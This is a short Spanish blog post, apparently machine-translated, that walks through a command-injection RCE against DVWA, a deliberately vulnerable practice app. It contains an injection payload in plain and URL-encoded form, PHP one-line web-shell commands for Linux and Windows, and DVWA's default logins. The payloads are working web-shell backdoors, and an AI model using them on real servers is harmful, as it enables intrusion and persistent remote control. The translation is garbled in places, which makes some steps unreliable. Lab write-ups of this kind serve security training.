[Recurrencia de vulnerabilidad] RCE causado por acceso no autorizado a DVWA en el campo de tiro

1Dirección de vulnerabilidad:

http://xxxx.vom/vulnerabilities/exec/source/low.php

2 razones de la vulnerabilidad:

Ejecución de comandos de empalme directo.

3 Verificación de vulnerabilidad

Linux escribe phpinfo(); en el directorio hackable/uploads/ (también puede escribirlo directamente en el directorio actual)
contenido de texto sin formato:
1&echo “<?php phpinfo();?>” > …/…/…/hackable/ uploads/4.
Explotación después de
la codificación php: ip=%31%26%65%63%68%6f%20%22%3c%3f%70%68%70%20%70%68%70%69%6e% 66%6f %28%29%3b%3f%3e%22%20%3e%20%2e%2e%2f%2e%2e%2f%2e%2e%2f%68%61%63%6b%61% 62%6c %65%2f%75%70%6c%6f%61%64%73%2f%34%2e%70%68%70&Submit=Enviar
Insertar descripción de la imagen aquí

Linux escribe una frase troyana:

echo '<? php @eval($_POST["x"]); ?>' >shell.php

Windows escribe una oración para evitar que el navegador escriba escapes, así que agregue ^:

echo ^<? php @eval($_POST['x']); ?^> >shell.php

4.Contraseña predeterminada

Parece que puedes iniciar sesión directamente con la contraseña predeterminada.
gordonb/abc123
1337/charley
pablo/letmein
smithy/contraseña

Supongo que te gusta

Origin blog.csdn.net/weixin_54430466/article/details/131527163
Recomendado
Clasificación